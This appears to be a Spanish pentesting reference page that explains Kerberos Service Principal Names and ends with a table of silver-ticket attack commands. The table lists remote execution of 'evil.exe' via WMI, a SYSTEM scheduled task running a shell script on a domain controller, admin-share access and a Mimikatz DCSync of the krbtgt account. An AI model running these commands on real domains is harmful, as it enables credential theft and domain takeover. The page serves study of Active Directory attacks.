# Service Principal Name (SPN)

Un Service Principal Name (SPN) es un identificador único asignado a cada instancia de servicio que se ejecuta en un servidor y utiliza el protocolo de autenticación Kerberos. Los SPN se utilizan en los sistemas de Active Directory (AD) para ayudar a los clientes a asociar un servicio específico con una cuenta de inicio de sesión y autenticar de forma segura los servicios de red.

Aquí hay algunos de los SPN más comunes y sus usos asociados:

1. <mark style="color:red;">**HTTP**</mark><mark style="color:red;">:</mark> Se utiliza para servicios web o aplicaciones que funcionan sobre HTTP/S. Es importante para la autenticación en aplicaciones web y servicios que utilizan Kerberos para la autenticación integrada de Windows.
2. <mark style="color:red;">**MSSQLSvc**</mark><mark style="color:red;">:</mark> Utilizado por las instancias de Microsoft SQL Server. Este es crítico para la autenticación y las conexiones seguras a bases de datos SQL.
3. <mark style="color:red;">**WSMAN**</mark><mark style="color:red;">:</mark> Utilizado para la administración basada en estándares de hardware y sistemas operativos (Windows Remote Management).
4. <mark style="color:red;">**TERMSRV**</mark><mark style="color:red;">:</mark> Utilizado por los servicios de Terminal Server (Remote Desktop Services). Es vital para la autenticación en sesiones de escritorio remoto.
5. <mark style="color:red;">**CIFS**</mark><mark style="color:red;">:</mark> Utilizado para el sistema de archivos de Internet común, relacionado con el intercambio de archivos y los servicios de impresión.
6. <mark style="color:red;">**HOST**</mark><mark style="color:red;">:</mark> Un SPN genérico que representa cualquier servicio predeterminado en un sistema operativo Windows.
7. <mark style="color:red;">**SMTPSvc**</mark><mark style="color:red;">:</mark> Para el servicio de transporte de correo simple, utilizado en la autenticación de servidores de correo electrónico.

Posibles vectores de ataque:

<table><thead><tr><th width="185">Tipo de servicio</th><th width="203.33333333333331">Service Silver Tickets</th><th>Comando relacionado al ataque</th></tr></thead><tbody><tr><td>WMI</td><td>HOST + RPCSS</td><td><code>wmic.exe /authority:"kerberos:DOMAIN\DC01" /node:"DC01" process call create "cmd /c evil.exe"</code></td></tr><tr><td>PowerShell Remoting</td><td>CIFS + HTTP + (wsman?)</td><td><code>New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC</code></td></tr><tr><td>WinRM</td><td>HTTP + wsman</td><td><code>New-PSSESSION -NAME PSC -ComputerName DC01; Enter-PSSession -Name PSC</code></td></tr><tr><td>Scheduled Tasks</td><td>HOST</td><td><code>schtasks /create /s dc01 /SC WEEKLY /RU "NT Authority\System" /IN "SCOM Agent Health Check" /IR "C:/shell.ps1"</code></td></tr><tr><td>Windows File Share (CIFS)</td><td>CIFS</td><td><code>dir \\dc01\c$</code></td></tr><tr><td>LDAP operations including Mimikatz DCSync</td><td>LDAP</td><td><code>lsadump::dcsync /dc:dc01 /domain:domain.local /user:krbtgt</code></td></tr><tr><td>Windows Remote Server Administration Tools</td><td>RPCSS + LDAP + CIFS</td><td>/</td></tr></tbody></table>